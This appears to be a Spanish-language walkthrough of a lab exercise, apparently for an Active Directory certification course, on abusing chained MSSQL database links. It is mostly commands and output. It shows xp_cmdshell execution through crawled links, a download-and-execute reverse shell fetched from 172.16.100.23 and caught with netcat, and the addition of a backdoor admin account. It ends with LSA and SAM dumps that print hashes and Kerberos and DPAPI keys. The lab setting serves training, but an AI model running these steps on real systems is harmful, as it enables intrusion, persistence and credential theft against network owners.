Learning Objective - 22

MSSQL Servers

Descubriendo SPNs.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain


ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon        : 1/10/2024 3:22 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mgmt.dollarcorp.moneycorp.local
Instance         : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount    : svcadmin
DomainAccountCn  : svc admin
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon        : 1/10/2024 3:22 AM
Description      : Account to be used for services which need high privileges.

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-mssql.dollarcorp.moneycorp.local
Instance         : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount    : DCORP-MSSQL$
DomainAccountCn  : DCORP-MSSQL
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon        : 3/5/2024 11:56 AM
Description      :

ComputerName     : dcorp-sql1.dollarcorp.moneycorp.local
Instance         : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount    : DCORP-SQL1$
DomainAccountCn  : DCORP-SQL1
Service          : MSSQLSvc
Spn              : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon        : 3/5/2024 11:56 AM
Description      :

Verificando acceso a los servicios.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: DCORP-STD723 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName                           Instance                                    Status
------------                           --------                                    ------
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local       Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local      Accessible
dcorp-mgmt.dollarcorp.moneycorp.local  dcorp-mgmt.dollarcorp.moneycorp.local,1433  Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local       Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local  dcorp-sql1.dollarcorp.moneycorp.local,1433  Not Accessible
DCORP-STD723                           DCORP-STD723                                Not Accessible

Recolectamos informacion de los servicios a los cuales tenemos acceso.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.


ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1976
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student723
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1976
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student723
IsSysadmin             : No
ActiveSessions         : 1

Buscando enlaces al un servicio remoto de MSSQL.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.


ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 0
DatabaseLinkName       : DCORP-MSSQL
DatabaseLinkLocation   : Local
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : True
is_data_access_enabled : False
modify_date            : 11/14/2022 4:46:10 AM

ComputerName           : dcorp-mssql
Instance               : dcorp-mssql
DatabaseLinkId         : 1
DatabaseLinkName       : DCORP-SQL1
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
Catalog                :
LocalLogin             :
RemoteLoginName        :
is_rpc_out_enabled     : False
is_data_access_enabled : True
modify_date            : 12/4/2022 5:16:19 AM

Enumerando enlaces de manera recursiva.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL
VERBOSE:  - Link Login: dcorp\student723
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE:  - Link Login: dblinkuser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE:  - Link Login: sqluser
VERBOSE:  - Link IsSysAdmin: 0
VERBOSE:  - Link Count: 1
VERBOSE:  - Links on this server: EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE:  Server: EU-SQL37
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Luego ejecutamos comandos con el siguiente comando:

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Probamos desde el uso de powershell.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""whoami""'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Luego Ejecutamos una reverse shell como ya lo hicimos antes pero esta vez usaremos otro metodo de descarga por powershell.

PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""iex (iwr -UseBasicParsing http://172.16.100.23:8080/Invoke-PowerShellTcp.ps1)""'" -QueryTarget eu-sql37


Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student723
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL37.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL37
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User        : sa
Links       :

En nuestra otra terminal escuchamos en el puerto seteado y obtenemos shell.

C:\AD\Tools\netcat-win32-1.12>.\nc.exe -lvp 6969
listening on [any] 6969 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.15.17] 56047: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL37
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql37
PS C:\Windows\system32>

Ahora intentaremos ver la informacion del dominio actual.

PS C:\> Invoke-WebRequest -Uri "http://172.16.100.23:8080/PowerView.ps1" -OutFile "PowerView.ps1"
PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/14/2022   7:42 PM                Program Files
d-----        11/14/2022   7:41 PM                Program Files (x86)
d-r---        11/15/2022   1:49 AM                Users
d-----         1/10/2024   5:38 AM                Windows
-a----          3/6/2024   6:11 AM         924339 PowerView.ps1

PS C:\> . .\PowerView.ps1
PS C:\> Get-DomainComputer | select samaccountname

samaccountname
--------------
EU-DC$
EU-SQL37$


PS C:\> Get-DomainUser | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt
dbadmin

PS C:\> Get-DomainTrust


SourceName      : eu.eurocorp.local
TargetName      : eurocorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 5:49:08 AM
WhenChanged     : 2/20/2024 7:48:15 AM

PS C:\> Get-Forest


RootDomainSid         : S-1-5-21-3333069040-3914854601-3606488808
Name                  : eurocorp.local
Sites                 : {Default-First-Site-Name}
Domains               : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs        : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
                        DC=DomainDnsZones,DC=eurocorp,DC=local}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : eurocorp.local
Schema                : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner       : eurocorp-dc.eurocorp.local
NamingRoleOwner       : eurocorp-dc.eurocorp.local

PS C:\> Get-DomainComputer -Domain eurocorp.local | select samaccountname

samaccountname
--------------
EUROCORP-DC$

PS C:\> Get-DomainUser -Domain eurocorp.local | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt

PS C:\> Get-DomainTrust -Domain eurocorp.local


SourceName      : eurocorp.local
TargetName      : eu.eurocorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 5:49:08 AM
WhenChanged     : 2/20/2024 7:48:14 AM

SourceName      : eurocorp.local
TargetName      : dollarcorp.moneycorp.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection  : Bidirectional
WhenCreated     : 11/12/2022 8:15:23 AM
WhenChanged     : 2/20/2024 7:50:52 AM

Tambien verificamos que tenemos acceso al computador desde nuestro PC.

PS C:\AD\Tools\PowerUpSQL-master> nslookup EU-SQL37.EU.EUROCORP.LOCAL
Server:  UnKnown
Address:  172.16.2.1

Non-authoritative answer:
Name:    EU-SQL37.EU.EUROCORP.LOCAL
Address:  172.16.15.17

PS C:\AD\Tools\PowerUpSQL-master> ping 172.16.15.17

Pinging 172.16.15.17 with 32 bytes of data:
Reply from 172.16.15.17: bytes=32 time=5ms TTL=127
Reply from 172.16.15.17: bytes=32 time=4ms TTL=127

Ping statistics for 172.16.15.17:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 4ms, Maximum = 5ms, Average = 4ms

Haciendo persistencia media mañosa XD

PS C:\Windows\system32> net user bombitaeu Password123! /add
The command completed successfully.

PS C:\Windows\system32> net localgroup administrators bombitaeu /add
The command completed successfully.

PS C:\Windows\system32> net user bombitaeu
User name                    bombitaeu
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/6/2024 6:34:21 AM
Password expires             4/17/2024 6:34:21 AM
Password changeable          3/7/2024 6:34:21 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.

PS C:\Windows\system32>

Dumpeamos lo que podamos.

crackmapexec smb 172.16.15.17 -u 'bombitaeu' -p 'Password123!' -d '.' --lsa
SMB         172.16.15.17    445    EU-SQL37         [*] Windows 10.0 Build 20348 x64 (name:EU-SQL37) (domain:.) (signing:False) (SMBv1:False)
SMB         172.16.15.17    445    EU-SQL37         [+] .\bombitaeu:Password123! (Pwn3d!)
SMB         172.16.15.17    445    EU-SQL37         [+] Dumping LSA secrets
SMB         172.16.15.17    445    EU-SQL37         EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
SMB         172.16.15.17    445    EU-SQL37         EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
SMB         172.16.15.17    445    EU-SQL37         dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
SMB         172.16.15.17    445    EU-SQL37         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.15.17    445    EU-SQL37         [+] Dumped 8 LSA secrets to /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.secrets and /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.cached

impacket-secretsdump '[email protected]'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Target system bootKey: 0x5522f4ec06d0bf5dac89558b5e57206e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdcfd73ba273d2b6ab67f1fecd83e88e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
[*] NL$KM 
 0000   09 C8 7B C2 96 41 6E CB  B2 F6 1B DC 29 5C 39 76   ..{..An.....)\9v
 0010   7E A6 22 97 DC D3 BE 6B  C3 71 48 71 61 6B B2 B3   ~."....k.qHqak..
 0020   D0 D6 E0 48 F0 8B 7D 8B  8B 14 95 05 B4 21 FE 93   ...H..}......!..
 0030   28 51 47 F1 26 24 B5 F4  E4 20 B6 AC E5 90 33 02   (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] Cleaning up...

Consultando mediante consultas SQL directamente

Como esta fallando, realizaremos las pruebas desde SQL.

Segundo salto.

Tercer salto.

Ejecutando comandos.

select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')

Luego podemos ver que el directorio test si a sido creado.

PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/14/2022   7:42 PM                Program Files
d-----        11/14/2022   7:41 PM                Program Files (x86)
d-----          3/6/2024   7:18 AM                test
d-r---        11/15/2022   1:49 AM                Users
d-----         1/10/2024   5:38 AM                Windows
-a----          3/6/2024   6:11 AM         924339 PowerView.ps1

PreviousAD CS - ESC1

Last updated 1 year ago

hashtagMSSQL Servers

hashtagConsultando mediante consultas SQL directamente

MSSQL Servers

Consultando mediante consultas SQL directamente